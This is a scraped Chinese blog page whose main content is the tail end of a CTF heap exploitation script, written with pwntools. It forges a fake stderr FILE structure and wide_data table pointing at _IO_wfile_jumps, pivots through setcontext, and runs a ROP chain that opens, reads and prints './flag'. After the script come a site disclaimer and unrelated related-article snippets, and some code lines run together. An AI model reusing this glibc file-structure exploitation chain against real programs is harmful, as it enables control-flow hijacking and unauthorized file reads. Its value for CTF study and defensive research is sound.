edit(2,b"2"*0x20+p64(0)+p64(0x41)+b"3"*0x30+p64(0)+p64(0x501),b"",b"",b"",1,1) #恢复原来被覆盖的部分buy(5,b"5"*0x50,b"5"*0x50,b"5"*0x50,b"5"*0xd0,1,1)
buy(6,b"5"*0x150,b"5"*0x150,b"5"*0x150,b"5"*0x160,1,1)
buy(7,b"5"*0x30,b"5"*0x10,b"5"*0x10,b"5"*0x10,1,1)rdi=0x2a3e5+libc.address
rsi=libc.address+0x2be51
rdx_r12=libc.address+0x11f2e7
syscall=libc.address+0x1147e0
rax=libc.address+0x45eb0
ret=libc.address+0x29139
ret=libc.address+0x29139
wide_data_chunk=heap+0x1ed0
stderr=libc.address+0x21b6a0
_IO_wfile_jumps=libc.address+0x2170c0
vatabl=heap+0x1ed0+0xe8 
#+0x68wide_data=b"\x00"
wide_data=wide_data.ljust(0x18,b"\x00")
wide_data+=p64(0)
wide_data=wide_data.ljust(0x30,b"\x00")
wide_data+=p64(0)
wide_data=wide_data.ljust(0xa0,b"\x00")
wide_data+=p64(wide_data_chunk+0x210)+p64(ret)wide_data=wide_data.ljust(0xe0,b"\x00")
wide_data+=p64(vatabl)
wide_data=wide_data.ljust(0x150,b"\x00")
wide_data+=p64(libc.address+0x53a1d) #setcontext
wide_data=wide_data.ljust(0x200,b"\x00")wide_data+=b'./flag\x00\x00'+p64(0)+p64(rdi)+p64(wide_data_chunk+0x200)+p64(rsi)+p64(0)+p64(rax)+p64(2)+p64(syscall)
wide_data+=p64(rdi)+p64(3)+p64(rsi)+p64(heap)+p64(rdx_r12)+p64(0x30)+p64(0)+p64(rax)+p64(0)+p64(syscall)
wide_data+=p64(rdi)+p64(1)+p64(rsi)+p64(heap)+p64(rdx_r12)+p64(0x30)+p64(0)+p64(rax)+p64(1)+p64(syscall)+p64(rdi)+p64(0)+p64(rax)+p64(0x3c)+p64(syscall)wide_data=wide_data.ljust(0x500,b"\x00") #使得大小能分配一个不是从bin中来的buy(8,wide_data,b"",b"",b"",1,1) #分裂largechunkprint("stderr",hex(stderr))
edit(2,b"2"*0x70+p64(stderr),b"",b"",b"",1,1) #写入stderrfake_stderr=p64((~(0x2|0x8|0x800))&0xffffffffffffffff)+p64(0)+p64(0)*3+p64(1) #writeptr
fake_stderr=fake_stderr.ljust(0xa0,b"\x00")
fake_stderr+=p64(wide_data_chunk)
fake_stderr=fake_stderr.ljust(0xd8,b"\x00")
fake_stderr+=p64(_IO_wfile_jumps)
edit(8,fake_stderr,b"",b"",b"",1,1)gdb.attach(p)
pause()
p.sendlineafter(b'Enter your choice > ',b'6')p.interactive()

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/343712.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

mysql工具----dbForgeStudio2020

dbForgeStudio2020&#xff0c;除了基本的操作外&#xff0c;还具有可调试mysql存储过程的功能&#xff0c;是一个不可夺得的mysql软件工具。 本文的软件将简单介绍软件的安装方式&#xff0c;仅供学习交流&#xff0c;不可做它用。 1.安装软件&#xff0c;安装后&#xff0c…

Linux 中常用的设置、工具和操作

1.设置固定的ip地址步骤 1.1 添加IPADDR“所设置的固定ip地址” TYPE"Ethernet" PROXY_METHOD"none" BROWSER_ONLY"no" BOOTPROTO"static" DEFROUTE"yes" IPV4_FAILURE_FATAL"no" IPV6INIT"yes" IPV6…

Intel x86+FPGA:智能AI计算机系统在支气管导航机器人的应用

随着人工智能的快速发展、技术的突破及应用领域的逐渐广泛化。医疗机器人作为人工智能时代在医疗领域应用的深化&#xff0c;能够有效帮助医生进行一系列的医疗诊断和辅助治疗&#xff0c;在有效缓解医疗资源紧张的问题下推动医疗信息化的发展。 智慧医疗场景应用 从应用场景来…

论文阅读 A Distributional Framework for Data Valuation

本论文解决的问题 量化数据价值&#xff08;机器学习模型训练中各个数据点的贡献&#xff09; 避免数据价值受到其所处数据集的影响&#xff0c;使数据点的估值更加稳定、一致 变量假设 假设 D 表示一个在全集 Z 上的数据分布。对于监督学习问题&#xff0c;我们通常认为 Z…

力扣 74.搜索二维矩阵

题目描述&#xff1a; 给你一个满足下述两条属性的 m x n 整数矩阵&#xff1a; 每行中的整数从左到右按非严格递增顺序排列。每行的第一个整数大于前一行的最后一个整数。 给你一个整数 target &#xff0c;如果 target 在矩阵中&#xff0c;返回 true &#xff1b;否则&am…

走进 Apache 世界的另一扇大门

引言 作为热爱技术的你&#xff0c;是否也羡慕 Apache PMC 或者 Committer&#xff0c;此篇文章渣渣皮带你迈出如何成为技术大牛的第一步。 当然我现在还是一枚小小的 code contributor&#xff0c;在成为 committer 的路上还在奋力打码中&#xff0c;写这篇文章也是为大家有…

tailwindcss的@apply使用

tailwindcss的apply是把在html写的tailwindcss可以挪到style里面 简化页面的可读性 没写之前的 <section class"block-risk absolute flex flex-col items-center p-4 text-center left-0 text-white;" :style"{ top, left: 60px }"> </section…

【Java】解决Java报错:ArrayIndexOutOfBoundsException

文章目录 引言1. 错误详解2. 常见的出错场景2.1 直接访问数组越界2.2 循环中的索引错误2.3 多维数组的错误访问 3. 解决方案3.1 检查数组长度3.2 正确使用循环3.3 多维数组的正确访问 4. 预防措施4.1 使用增强型 for 循环4.2 编写防御性代码4.3 单元测试 结语 引言 在Java编程…

数据脱敏技术方案选择(word)

1 概述 1.1 数据脱敏定义 1.2 数据脱敏原则 1.2.1基本原则 1.2.2技术原则 1.2.3管理原则 1.3 数据脱敏常用方法 3.1.1泛化技术 3.1.2抑制技术 3.1.3扰乱技术 3.1.4有损技术 1.4 数据脱敏全生命周期 2 制定数据脱敏规程 3 发现敏感数据 4 定义脱敏规则 5 执…

Stable Diffusion WebUI 各操作系统安装教程

最近几天在 2 台 Mac、2 台 PC、一台云无 GPU 的 Linux 安装了 Stable Diffusion WebUI&#xff0c;这里记录下如何安装&#xff0c;以及一些注意点和坑。 以下内容针对 Windows&#xff08;N 卡&#xff09;、MacOS&#xff08;m 系列芯片&#xff09;、Linux&#xff08;Ubu…

ubuntu20.04设置文件开机自启动

硬件&#xff1a;树霉派4B 系统&#xff1a;ubuntu20.04 在ubuntu20.04上经常需要运行 ./BluetoothServerParse_L.c ,比较繁琐&#xff0c;想要设置开机自启动&#xff0c;让树霉派4B在接上电源之后就自动运行该程序。使用systemd服务&#xff0c;设置步骤如下&#xff1a; &…

Vulnhub-DC-4

靶机IP:192.168.20.138 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP) 信息收集 nmap扫下端口及版本 dirsearch扫下目录 没发现什么敏感信息&#xff0c;看下前端界面 想到会不会存在SQL注入&#xff0c;弱密码等漏洞。 经过测试SQL注入…

数智融通 创新发展|亚信科技携AntDB、Data OS与隐私计算产品,赋能企业高质量发展

5月21日&#xff0c;亚信科技在云端举办了一场别开生面的研讨会——“数智融通 创新发展”&#xff0c;聚焦企业数智化升级的前沿话题。资深产品经理和技术架构师们面对面深入交流&#xff0c;分享创新成果与实战案例&#xff0c;共同探索企业数智化转型的新路径。 图1&#xf…

[Algorithm][动态规划][01背包问题][模板 背包][分割等和子集]详细讲解 +何为背包问题?

目录 0.何为背包问题&#xff1f;1.模板 背包1.题目链接2.算法原理详解3.代码实现 2.分割等和子集1.题目链接2.算法原理详解3.代码实现 0.何为背包问题&#xff1f; 背包问题&#xff1a;有限制条件下的"组合问题" 你有一个背包&#xff0c;地上有一堆物品&#xff…

JDBC编程

一. 概念 概念理解: 1) API 全称为"应用程序编程接口", 把这个词理解成"一组类"/"一组方法", 都是现成的(别的大佬写好的), 可以直接进行调用, 就可以实现一些效果 对于java来说, java提供了"标准库", 叫做标准库的API, 你只要安装…

PDF 文件的解析

1、文本 PDF 的解析 1.1、文本的提取 进行文本提取的 Python 库包括&#xff1a;pdfminer.six、PyMuPDF、PyPDF2 和 pdfplumber&#xff0c;效果最好的是 PyMuPDF&#xff0c;PyMuPDF 在进行文本提取时能够最大限度地保留 PDF 的阅读顺序&#xff0c;这对于双栏 PDF 文件的抽…

一分钟学习数据安全—自主管理身份SSI加密技术

上篇介绍了SSI的架构。架构之后&#xff0c;我们要了解一下SSI发展的驱动力&#xff1a;加密技术。现代数字通信离不开数学和计算机科学&#xff0c;加密技术也源于此。加密技术使区块链和分布式账本得以实现&#xff0c;也使SSI成为可能。 以下我们就概览一下SSI基础架构中涉及…

【Java毕业设计】基于JavaWeb的旅游论坛管理系统

文章目录 摘 要目 录1 概述1.1 研究背景及意义1.2 国内外研究现状1.3 拟研究内容1.4 系统开发技术1.4.1 Java编程语言1.4.2 vue技术1.4.3 MySQL数据库1.4.4 B/S结构1.4.5 Spring Boot框架 2 系统需求分析2.1 可行性分析2.2 系统流程2.2.1 操作流程2.2.2 登录流程2.2.3 删除信息…

基于Springboot+vue实现的汽车服务管理系统

作者主页&#xff1a;Java码库 主营内容&#xff1a;SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app等设计与开发。 收藏点赞不迷路 关注作者有好处 文末获取源码 技术选型 【后端】&#xff1a;Java 【框架】&#xff1a;spring…

6.6SSH的运用

ssh远程管理 ssh是一种安全通道协议&#xff0c;用来实现字符界面的远程登录。远程复制&#xff0c;远程文本传输。 ssh对通信双方的数据进行了加密 用户名和密码登录 密钥对认证方式&#xff08;可以实现免密登录&#xff09; ssh 22 网络层 传输层 数据传输的过程中是加密的 …